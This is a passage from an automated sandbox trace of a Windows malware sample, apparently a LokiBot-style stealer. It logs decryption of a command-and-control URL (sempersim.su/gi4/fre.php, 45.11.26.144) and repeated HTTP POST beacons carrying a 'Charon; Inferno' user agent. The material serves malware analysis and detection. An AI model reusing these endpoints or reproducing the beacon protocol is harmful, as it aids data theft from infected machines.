CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0252.223] GetProcessHeap () returned 0x5b0000 [0252.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0252.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.224] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0252.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.224] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0252.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.225] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0252.225] GetProcessHeap () returned 0x5b0000 [0252.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0252.225] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0252.228] GetProcessHeap () returned 0x5b0000 [0252.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0252.228] socket (af=2, type=1, protocol=6) returned 0x390 [0252.229] connect (s=0x390, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0252.295] FreeAddrInfoW (pAddrInfo=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0252.295] GetProcessHeap () returned 0x5b0000 [0252.295] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0252.296] GetProcessHeap () returned 0x5b0000 [0252.296] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0252.296] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0252.297] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0252.297] GetProcessHeap () returned 0x5b0000 [0252.297] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0252.297] GetProcessHeap () returned 0x5b0000 [0252.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0252.298] GetProcessHeap () returned 0x5b0000 [0252.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3038 [0252.298] GetProcessHeap () returned 0x5b0000 [0252.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0252.299] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0252.300] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0252.300] GetProcessHeap () returned 0x5b0000 [0252.300] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0252.300] GetProcessHeap () returned 0x5b0000 [0252.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0252.300] send (s=0x390, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0252.301] send (s=0x390, buf=0x5d1e18*, len=159, flags=0) returned 159 [0252.301] GetProcessHeap () returned 0x5b0000 [0252.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0252.301] recv (in: s=0x390, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0253.554] GetProcessHeap () returned 0x5b0000 [0253.556] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0253.556] GetProcessHeap () returned 0x5b0000 [0253.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0253.557] GetProcessHeap () returned 0x5b0000 [0253.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0253.557] GetProcessHeap () returned 0x5b0000 [0253.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0253.557] closesocket (s=0x390) returned 0 [0253.558] GetProcessHeap () returned 0x5b0000 [0253.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0253.558] GetProcessHeap () returned 0x5b0000 [0253.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0253.559] GetProcessHeap () returned 0x5b0000 [0253.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0253.559] GetProcessHeap () returned 0x5b0000 [0253.560] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0253.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb5c) returned 0x390 [0253.564] Sleep (dwMilliseconds=0xea60) [0253.585] GetProcessHeap () returned 0x5b0000 [0253.585] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0253.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.586] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0253.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.599] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0253.607] GetProcessHeap () returned 0x5b0000 [0253.607] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0253.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.608] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0253.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.612] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0253.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.613] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.613] GetProcessHeap () returned 0x5b0000 [0253.613] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0253.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.614] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0253.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.615] CryptDestroyKey (hKey=0x5bde08) returned 1 [0253.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.616] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0253.616] GetProcessHeap () returned 0x5b0000 [0253.616] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0253.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.617] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.618] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.619] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.620] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.620] GetProcessHeap () returned 0x5b0000 [0253.620] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0253.620] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0253.621] GetProcessHeap () returned 0x5b0000 [0253.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0253.622] GetProcessHeap () returned 0x5b0000 [0253.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0253.622] GetProcessHeap () returned 0x5b0000 [0253.623] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0253.623] GetProcessHeap () returned 0x5b0000 [0253.623] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0253.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.626] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0253.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.632] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0253.641] GetProcessHeap () returned 0x5b0000 [0253.641] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0253.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.642] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0253.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.643] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0253.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.644] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.644] GetProcessHeap () returned 0x5b0000 [0253.645] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0253.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.646] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0253.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.647] CryptDestroyKey (hKey=0x5bde08) returned 1 [0253.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0253.648] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0253.649] GetProcessHeap () returned 0x5b0000 [0253.649] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0253.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.650] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0253.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.650] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0253.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.651] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0253.651] GetProcessHeap () returned 0x5b0000 [0253.651] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0253.651] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0253.654] GetProcessHeap () returned 0x5b0000 [0253.654] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0253.654] socket (af=2, type=1, protocol=6) returned 0x394 [0253.654] connect (s=0x394, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0253.744] FreeAddrInfoW (pAddrInfo=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0253.744] GetProcessHeap () returned 0x5b0000 [0253.745] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0253.745] GetProcessHeap () returned 0x5b0000 [0253.745] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0253.746] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0253.747] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0253.747] GetProcessHeap () returned 0x5b0000 [0253.747] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0253.748] GetProcessHeap () returned 0x5b0000 [0253.748] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0253.748] GetProcessHeap () returned 0x5b0000 [0253.748] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0253.748] GetProcessHeap () returned 0x5b0000 [0253.748] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0253.749] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0253.750] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0253.750] GetProcessHeap () returned 0x5b0000 [0253.750] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0253.750] GetProcessHeap () returned 0x5b0000 [0253.750] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0253.751] send (s=0x394, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0253.751] send (s=0x394, buf=0x5d1e18*, len=159, flags=0) returned 159 [0253.751] GetProcessHeap () returned 0x5b0000 [0253.751] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0253.751] recv (in: s=0x394, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0255.009] GetProcessHeap () returned 0x5b0000 [0255.009] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0255.009] GetProcessHeap () returned 0x5b0000 [0255.010] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0255.010] GetProcessHeap () returned 0x5b0000 [0255.010] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0255.010] GetProcessHeap () returned 0x5b0000 [0255.010] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0255.010] closesocket (s=0x394) returned 0 [0255.011] GetProcessHeap () returned 0x5b0000 [0255.011] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0255.011] GetProcessHeap () returned 0x5b0000 [0255.011] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0255.011] GetProcessHeap () returned 0x5b0000 [0255.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0255.012] GetProcessHeap () returned 0x5b0000 [0255.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0255.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xa94) returned 0x394 [0255.021] Sleep (dwMilliseconds=0xea60) [0255.036] GetProcessHeap () returned 0x5b0000 [0255.036] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0255.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.037] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0255.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.047] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0255.058] GetProcessHeap () returned 0x5b0000 [0255.058] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0255.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.059] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0255.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.061] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0255.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.065] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.065] GetProcessHeap () returned 0x5b0000 [0255.066] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0255.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.067] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0255.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.068] CryptDestroyKey (hKey=0x5bde08) returned 1 [0255.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.069] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0255.069] GetProcessHeap () returned 0x5b0000 [0255.069] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0255.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.071] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.072] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.073] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.075] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.075] GetProcessHeap () returned 0x5b0000 [0255.075] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0255.075] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0255.075] GetProcessHeap () returned 0x5b0000 [0255.075] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0255.090] GetProcessHeap () returned 0x5b0000 [0255.091] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0255.091] GetProcessHeap () returned 0x5b0000 [0255.091] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0255.091] GetProcessHeap () returned 0x5b0000 [0255.091] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0255.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.093] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0255.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.099] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0255.106] GetProcessHeap () returned 0x5b0000 [0255.106] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0255.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.108] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0255.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.113] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0255.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.114] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.114] GetProcessHeap () returned 0x5b0000 [0255.115] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0255.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.116] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0255.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.118] CryptDestroyKey (hKey=0x5bde08) returned 1 [0255.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0255.119] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0255.119] GetProcessHeap () returned 0x5b0000 [0255.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0255.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.121] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0255.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.123] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0255.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.125] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0255.125] GetProcessHeap () returned 0x5b0000 [0255.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 